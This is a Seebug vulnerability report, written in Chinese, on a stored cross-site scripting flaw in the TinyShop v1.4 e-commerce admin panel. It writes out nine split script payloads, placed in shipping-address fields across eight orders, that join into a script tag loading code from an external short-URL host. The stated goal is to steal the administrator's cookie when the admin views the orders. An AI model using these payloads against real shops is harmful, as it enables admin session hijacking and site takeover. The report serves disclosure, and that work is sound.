Tinyshopv1.4用九笔恶意订单打后台

2015-04-22T00:00:00
ID SSV:94983
Type seebug
Reporter Root
Modified 2015-04-22T00:00:00

Description

简要描述:

后台储存型xss,获取管理cookie.

详细说明:

上午上课的时候,和傻强聊天: 我:"傻强你有女朋友吗?" 傻强:"有啊?" 我:"那你记得你女朋友生日吗?" 傻强:"等下,我去看下生产日期。。。" 我:"。。。。" TinyshopV1.4: 1、注册账号 2、添加地址 3、买东西,提交订单 4、管理查看订单,然后后台加载js代码 5、xss平台查看cookie 注册账号我就不说了: 添加地址处:(箭头所指处可控)

<img src="https://images.seebug.org/upload/201504/171307211107f5b7c8874a5519effef9ac95d12d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

但是后台可以利用的参数只有:

<img src="https://images.seebug.org/upload/201504/17130818ee7172758c1485547f13e7d68269e80b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

而且长度只有:

<img src="https://images.seebug.org/upload/201504/1713092500b19938f4b3da43dc2bc98a60941263.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

加起来也只有40字符,好像不够啊~~~ 不过后台订单是这样显示的:

<img src="https://images.seebug.org/upload/201504/17131422c00a1c2ad9b15c4b9c4b8c704abcfa72.png" alt="6.png" width="600" onerror="javascript:errimg(this);">

那么,我们就分几次加载js代码就好了: 构造出9个恶意地址: p1&lt;script&gt;x=/**/"&lt;scr"&lt;/script&gt; p2&lt;script&gt;x%2B=/**/"ipt "&lt;/script&gt; p3&lt;script&gt;x%2B=/**/"src="&lt;/script&gt; p4&lt;script&gt;x%2B=/**/"//t.c"&lt;/script&gt; p5&lt;script&gt;x%2B=/**/"n/RAC"&lt;/script&gt; p6&lt;script&gt;x%2B=/**/"HQ7S&gt;&lt;"&lt;/script&gt; p7&lt;script&gt;x%2B=/**/"\/sc"&lt;/script&gt; p8&lt;script&gt;x%2B=/**/"ript&gt;"&lt;/script&gt; p&lt;script&gt;document./**/write(x)&lt;/script&gt; 然后添加进去:

<img src="https://images.seebug.org/upload/201504/17131658e976e074ea9cb6ef69746020a264a1ec.png" alt="222.png" width="600" onerror="javascript:errimg(this);">

然后按p--->p1的地址顺序,买8样东西,提交订单:

<img src="https://images.seebug.org/upload/201504/1713191084ea7bddbd9b110239be3ed4d9009820.png" alt="0.png" width="600" onerror="javascript:errimg(this);">

体力活啊~~~

<img src="https://images.seebug.org/upload/201504/17132435e09909fa5c97d18be8e041fcc0c4ef19.png" alt="77.png" width="600" onerror="javascript:errimg(this);">

如上所示,js代码已经加载了:

<img src="https://images.seebug.org/upload/201504/17132609b9de89b3e2eb93b29008510310b98d6f.png" alt="02.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

<img src="https://images.seebug.org/upload/201504/171326531721d133cc658e75565ef195536881a6.png" alt="77.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/17132713ed2e4a2a892661bd6427415d6a20c475.png" alt="02.png" width="600" onerror="javascript:errimg(this);">